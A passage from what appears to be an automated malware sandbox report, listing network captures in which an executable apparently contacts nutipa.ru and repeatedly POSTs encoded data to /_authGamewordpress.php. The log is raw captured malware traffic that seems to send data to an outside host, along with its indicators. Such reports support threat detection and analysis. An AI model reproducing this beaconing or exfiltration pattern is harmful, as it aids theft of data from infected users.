                                                            Dec 15, 2024 19:38:08.464931965 CET4984880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:08.465217113 CET4984880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:08.586564064 CET8049848104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:08.690563917 CET4984780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:08.810574055 CET4984880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:08.810868025 CET8049847104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:08.810911894 CET8049847104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:08.931070089 CET8049848104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:08.931092024 CET8049848104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:08.931103945 CET8049848104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:09.102890968 CET8049846104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:09.103045940 CET4984680192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:09.426402092 CET8049847104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:09.530088902 CET4984780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:09.552788973 CET8049848104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:09.660123110 CET8049847104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:09.716737032 CET4984880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:09.716773987 CET4984780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:09.799356937 CET8049848104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:09.916552067 CET4984880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:09.916565895 CET4984780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:09.917062044 CET4984980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:10.037801981 CET8049848104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:10.037838936 CET8049849104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:10.038058996 CET4984980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:10.038096905 CET4984880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:10.038223028 CET4984980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:10.038276911 CET8049847104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:10.038430929 CET4984780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:10.162082911 CET8049849104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:10.388631105 CET4984980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:10.515667915 CET8049849104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:10.515698910 CET8049849104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:10.515728951 CET8049849104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:11.135191917 CET8049849104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:11.188563108 CET4984980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:11.386907101 CET8049849104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:11.511428118 CET4985080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:11.529196024 CET4984980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:11.632695913 CET8049850104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:11.632814884 CET4985080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:11.632988930 CET4985080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:11.753148079 CET8049850104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:11.982456923 CET4985080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:12.103276014 CET8049850104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:12.103360891 CET8049850104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:12.103389978 CET8049850104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:12.721189976 CET8049850104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:12.826122999 CET4985080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:12.956275940 CET8049850104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:13.016222954 CET4985080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:13.074230909 CET4985080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:13.074894905 CET4985180192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:13.194622040 CET8049850104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:13.194681883 CET8049851104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:13.194842100 CET4985080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:13.194845915 CET4985180192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:13.198107958 CET4985180192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:13.318262100 CET8049851104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:13.545295000 CET4985180192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:13.665472984 CET8049851104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:13.665493011 CET8049851104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:13.665502071 CET8049851104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:14.289156914 CET8049851104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:14.341691017 CET4985180192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:38:14.524080038 CET8049851104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:38:14.576061964 CET4985180192.168.2.4104.21.64.130

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Dec 15, 2024 19:36:23.324891090 CET6431753192.168.2.41.1.1.1
                                                            Dec 15, 2024 19:36:23.759043932 CET53643171.1.1.1192.168.2.4

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Dec 15, 2024 19:36:23.324891090 CET192.168.2.41.1.1.10xd72Standard query (0)nutipa.ruA (IP address)IN (0x0001)false

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Dec 15, 2024 19:36:23.759043932 CET1.1.1.1192.168.2.40xd72No error (0)nutipa.ru104.21.64.130A (IP address)IN (0x0001)false
                                                            Dec 15, 2024 19:36:23.759043932 CET1.1.1.1192.168.2.40xd72No error (0)nutipa.ru172.67.185.214A (IP address)IN (0x0001)false

                                                            HTTP Request Dependency Graph

                                                            • nutipa.ru

                                                            HTTP Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.449738104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:36:23.885973930 CET319OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 344
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 15, 2024 19:36:24.233082056 CET344OUTData Raw: 05 07 04 0c 06 0b 04 00 05 06 02 01 02 01 01 05 00 02 05 0b 02 06 03 0d 07 00 0f 00 05 0f 00 09 0c 0f 07 0f 07 02 04 01 0d 0b 07 51 07 01 05 0f 07 02 0b 0c 0f 05 04 57 06 50 05 06 07 0b 04 0f 01 02 0d 0c 04 0f 05 06 0f 06 0c 01 0a 00 0e 51 05 54
                                                            Data Ascii: QWPQTQ\L~C|^y^wubv|BTX`UhhZsXl|Zo`X}}sUvdti_~V@{SrL}\e
                                                            Dec 15, 2024 19:36:24.972141981 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:36:25.241660118 CET1236INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:36:25 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CohZsKrq5DtWBqVlHXUTKf3jiOjBYNv6SuXAZ%2BhsX6fZrA5VR6X%2F6V7Sa5u9zzKc%2FfSMWswDOIQX6ZHs1S3sDoCEBDpcFK2tr64msuC4ZNeY5n1jz2Lo%2B1Wbbbs%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f2889ff1e2e4294-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=7282&min_rtt=1948&rtt_var=11399&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=663&delivery_rate=32717&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 35 32 30 0d 0a 56 4a 7d 5f 6f 6d 7c 5e 78 72 6b 5a 7c 07 77 07 7d 77 70 52 7c 06 75 4f 7a 63 60 4f 7d 72 78 03 77 5d 57 08 6d 5f 53 49 75 48 73 5a 7d 61 78 01 55 4b 72 50 63 62 70 58 7f 04 65 05 7f 59 62 40 79 65 77 52 7d 5a 67 4a 76 62 5c 5c 77 4f 61 48 7c 58 66 04 7d 42 5e 0a 7f 67 56 5a 75 76 7b 06 7c 5c 62 58 7c 63 61 03 6f 49 68 04 6c 67 5d 5e 78 6d 59 00 7a 62 64 05 6f 70 66 05 7f 60 5e 49 7b 49 70 07 6a 4c 6f 07 61 61 64 02 7a 51 41 5b 68 74 68 0a 68 71 65 0d 75 7f 6c 06 7b 6f 6b 58 74 59 7a 0d 6e 62 79 01 7e 7c 69 5b 6f 61 62 4b 76 5d 67 03 62 62 64 04 74 71 7a 50 7e 5d 79 5f 60 5c 6d 01 76 66 74 09 68 6c 65 04 60 6f 70 04 68 63 6c 03 78 6f 7b 03 7b 5e 65 5a 6b 6d 5a 08 74 74 7f 5f 69 61 7d 50 7e 43 7f 4f 78 7e 7d 5c 6a 62 72 5a 7b 5d 46 51 6b 42 7f 52 69 5e 60 0d 69 67 76 4e 7b 43 56 5b 6f 62 77 58 7c 61 64 5e 6a 67 74 53 7c 5e 7d 0a 7a 5d 6b 58 7d 5c 60 46 60 05 65 51 7b 5c 79 44 75 48 5a 03 7d 48 64 02 7e 76 5f 08 77 72 73 4a 7f 4c 79 42 7f 49 76 0a 79 66 5e 41 7c 73 7b 02 76 62 6d 05 77 [TRUNCATED]
                                                            Data Ascii: 520VJ}_om|^xrkZ|w}wpR|uOzc`O}rxw]Wm_SIuHsZ}axUKrPcbpXeYb@yewR}ZgJvb\\wOaH|Xf}B^gVZuv{|\bX|caoIhlg]^xmYzbdopf`^I{IpjLoaadzQA[hthhqeul{okXtYznby~|i[oabKv]gbbdtqzP~]y_`\mvfthle`ophclxo{{^eZkmZtt_ia}P~COx~}\jbrZ{]FQkBRi^`igvN{CV[obwX|ad^jgtS|^}z]kX}\`F`eQ{\yDuHZ}Hd~v_wrsJLyBIvyf^A|s{vbmwOuaz~|x}gcKwawJ{\_J}NyxYtM{Yhxm{yb^x]z|`ZDxw|~bgOv_lH}|cIx|_WvR|x|RIt`nNzaa||bxOXKwsQIvOtwa\A~pbw
                                                            Dec 15, 2024 19:36:25.241697073 CET870INData Raw: 5c 53 4d 75 75 74 08 7c 7c 53 4d 77 42 60 01 7c 73 52 4b 78 42 77 06 7a 70 76 49 7c 53 7c 40 77 77 68 03 7e 5c 50 0b 7c 6d 7b 42 78 43 54 03 7d 72 69 07 7c 4e 60 0a 7f 52 78 0d 7e 60 68 42 7c 67 5c 05 78 6d 63 07 7b 62 78 05 7c 5f 59 4b 7e 77 77
                                                            Data Ascii: \SMuut||SMwB`|sRKxBwzpvI|S|@wwh~\P|m{BxCT}ri|N`Rx~`hB|g\xmc{bx|_YK~wwO|^}OzsRrpwce{qawvh}vRfm@t\LW|I~@yfpA~]IuL[vq}|OX~Bt@}Ysv_sxrmI|p}xI`ywZ{SsIzbtzsT{]NZod~L`Zurx~UcK|Id|qW@uB^ooxHv`ePy_y~z_z\yvxB
                                                            Dec 15, 2024 19:36:25.314455986 CET295OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 384
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:36:25.629704952 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:36:25.630789995 CET384OUTData Raw: 55 57 43 50 5a 5b 58 5f 5d 5a 56 51 50 5b 57 50 55 55 5e 46 5a 50 5b 5c 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: UWCPZ[X_]ZVQP[WPUU^FZP[\\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$^(Y*)#5+>(#82="\1:) <'>? 9U;.F'#P +
                                                            Dec 15, 2024 19:36:26.105432987 CET949INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:36:25 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DUElJ5bXNn7DAEn1O6Befx0pWUfHVKWwx4c0kiiMVKNNX8ngXndvFk30VNPvM6jjnQqHC%2BKQN4WZnkc5A2RxJ%2BO5uCBhypf1p1n4cnyRsw0bsWPN1IOuNv%2F12N4%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288a033cc44294-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=11144&min_rtt=1761&rtt_var=16512&sent=7&recv=8&lost=0&retrans=0&sent_bytes=2156&recv_bytes=1342&delivery_rate=2367567&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 39 38 0d 0a 06 1f 39 1e 36 03 32 56 37 07 2b 0a 39 3f 29 53 28 56 28 42 26 32 21 59 27 38 0d 1b 3d 3d 3b 11 26 5f 31 5b 34 0b 31 50 3c 37 07 5a 25 26 21 51 03 11 22 58 31 2e 0d 01 3d 07 06 16 24 22 34 05 26 3e 27 01 2a 28 31 0d 30 38 28 0a 34 58 24 1a 2e 39 38 12 28 3a 02 02 39 58 29 09 20 26 2e 53 0c 17 25 5b 29 2a 21 06 34 32 3a 0e 24 12 27 56 37 3a 31 0b 3e 20 33 09 26 30 3b 1f 24 2d 38 53 22 0e 0b 52 26 04 2d 01 34 0b 3d 0d 2a 18 25 5c 20 05 2e 52 03 34 5d 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 98962V7+9?)S(V(B&2!Y'8==;&_1[41P<7Z%&!Q"X1.=$"4&>'*(108(4X$.98(:9X) &.S%[)*!42:$'V7:1> 3&0;$-8S"R&-4=*%\ .R4]T0
                                                            Dec 15, 2024 19:36:26.148133039 CET296OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 1420
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:36:26.465931892 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:36:26.466133118 CET1420OUTData Raw: 55 55 43 59 5f 59 58 55 5d 5a 56 51 50 5b 57 54 55 53 5e 47 5a 55 5b 5c 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: UUCY_YXU]ZVQP[WTUS^GZU[\\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$[?*^*:[6<))>( 1=1'>%V= ?^$.(%R-+.F'#P +
                                                            Dec 15, 2024 19:36:26.995726109 CET949INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:36:26 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5u1dje8Anz0ARJFx3L1x33ctnfLc0BEvgqXUl2yrPiuwAi5Uv94%2F4vDMy9cYaQJ9LwQeX%2BKJxB8LBrLf9nPIvcTnO36aG1ilI84k8QXXNBmphEqKrcaLDDRnCAU%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288a087b674294-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=15521&min_rtt=1761&rtt_var=20520&sent=13&recv=13&lost=0&retrans=0&sent_bytes=3130&recv_bytes=3058&delivery_rate=2367567&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 39 38 0d 0a 06 1f 39 1e 22 03 3e 57 20 3d 34 50 39 02 07 57 3f 0e 0e 0b 26 21 2e 06 24 38 37 59 29 03 2c 0b 31 3a 35 1c 20 21 2a 0c 3e 37 22 02 26 26 21 51 03 11 22 1d 25 58 27 01 3e 07 30 16 31 21 0d 5b 25 03 28 5e 28 16 36 1e 26 28 20 0f 22 3d 27 0e 2d 2a 3c 5b 2b 2a 0d 5c 2f 2d 32 13 20 0c 2e 53 0c 17 25 59 3f 00 3e 58 37 1c 26 0f 24 12 1e 0f 37 39 3a 10 3d 0d 0d 0c 30 33 06 0c 24 2e 38 53 22 30 0f 51 31 2a 00 5f 23 0c 03 08 3e 08 25 5c 20 05 2e 52 03 34 5d 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 989">W =4P9W?&!.$87Y),1:5 !*>7"&&!Q"%X'>01![%(^(6&( "='-*<[+*\/-2 .S%Y?>X7&$79:=03$.8S"0Q1*_#>%\ .R4]T0
                                                            Dec 15, 2024 19:36:27.006078005 CET296OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:36:27.320672989 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:36:27.320895910 CET2536OUTData Raw: 50 54 43 5b 5a 5a 58 54 5d 5a 56 51 50 5b 57 5b 55 5d 5e 44 5a 57 5b 53 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: PTC[ZZXT]ZVQP[W[U]^DZW[S\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$+=?:<6,<=(#4Z&X>1(330-6^?U6,.F'#P +
                                                            Dec 15, 2024 19:36:27.842607975 CET802INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:36:27 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MiwSu24gsIVydCjyspmCvlR35h3Q5HimgIBzxL2puSv%2BvTVqovz19sw3RrXYhd%2BCeOFvH%2F5G0BLo8EW8CPr9OHE8M3wodBfWfLdv86roa3o9OlmNWGHvO3Td2GM%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288a0dcb014294-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=18896&min_rtt=1758&rtt_var=24287&sent=19&recv=18&lost=0&retrans=0&sent_bytes=4104&recv_bytes=5890&delivery_rate=2367567&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.449740104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:36:25.533586979 CET296OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:36:25.888679981 CET2536OUTData Raw: 55 53 46 5a 5a 5a 58 54 5d 5a 56 51 50 5c 57 56 55 54 5e 44 5a 55 5b 5f 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: USFZZZXT]ZVQP\WVUT^DZU[_\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y'?1)+]5<"E<=0!/(\2>-&>T>0<$>+3U8;.F'#P 7
                                                            Dec 15, 2024 19:36:26.626297951 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:36:26.869967937 CET791INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:36:26 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VsetH5FFxPJzwBuq9%2BoVtNyRPwdC9ysakghetsnYPwooon67XdaMWN6l5mbIcohQZKae5K0AMtTVK4kOHAHxqaYoMimCwQqhxydEVcVnik8dvajMfDyk5p5j24E%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288a09784018c0-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3298&min_rtt=1715&rtt_var=3810&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=101501&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.449742104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:36:28.096306086 CET296OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:36:28.451329947 CET2536OUTData Raw: 55 57 43 5b 5a 5b 5d 53 5d 5a 56 51 50 5d 57 57 55 5c 5e 47 5a 51 5b 58 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: UWC[Z[]S]ZVQP]WWU\^GZQ[X\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$?>+\#,?=#?'&--&=9U>$3>Y<3R/.F'#P 3
                                                            Dec 15, 2024 19:36:29.184340000 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:36:29.537604094 CET789INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:36:29 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cY441QkOktKkX8Lf76zUTySx2fpoK9cZ7jJ%2F2%2Fm4HDw4o08LbwvqADhCSuCh2HVfZq%2FToHX79biMZClywNdh9009jkTYWch9dX7bJcXsaQPlUozg4CoTZBFfGEU%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288a197a8a8c9c-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4186&min_rtt=2004&rtt_var=5116&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=75010&cwnd=195&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a
                                                            Data Ascii: 44W@T
                                                            Dec 15, 2024 19:36:29.729270935 CET5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.449745104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:36:30.186753988 CET320OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 15, 2024 19:36:30.547542095 CET2536OUTData Raw: 50 5f 43 5d 5f 56 58 54 5d 5a 56 51 50 59 57 5b 55 51 5e 43 5a 55 5b 5f 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
